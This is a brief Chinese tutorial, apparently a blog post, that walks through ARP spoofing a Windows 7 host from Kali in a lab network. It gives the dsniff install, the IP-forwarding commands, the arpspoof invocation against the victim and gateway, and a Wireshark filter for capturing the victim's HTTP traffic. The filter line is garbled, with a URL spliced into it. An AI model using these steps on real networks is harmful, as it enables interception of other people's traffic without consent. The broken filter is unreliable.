利用arpspoof工具获取内网浏览器信息 _arpspoof

环境：小攻：Kali 2020，ip：192.168.152.133
小受：win7 x86，ip：192.168.152.189
一、工具安装
1、arpspoof是dsniff 的一个附属工具，所以我们需要安装的是 dsniff
2、安装命令：apt-get install dsniff

文章插图

二、IP转发，如果不转发小受会断网
【利用arpspoof工具获取内网浏览器信息】1、开启转发
root@aiyou:/# echo 1 >/proc/sys/net/ipv4/ip_forward
2、关闭转发
root@aiyou:/# echo 0 >/proc/sys/net/ipv4/ip_forward
三、开始监听
arpspoof -t 192.168.152.189 192.168.152.2
-t 指定小受ip及网关地址

文章插图

四、打开wireshark捕获数据包
root@aiyou:~# wireshark

文章插图

五、小受访问一下网站
1、www.soho.com、www.baidu.com
2、可以在捕获数据包中设置过滤
ip.src=https://www.isolves.com/it/wl/js/2020-07-14/=192.168.152.189&&http
只查看源地址为192.168.152.189并且是htpp类型的数据包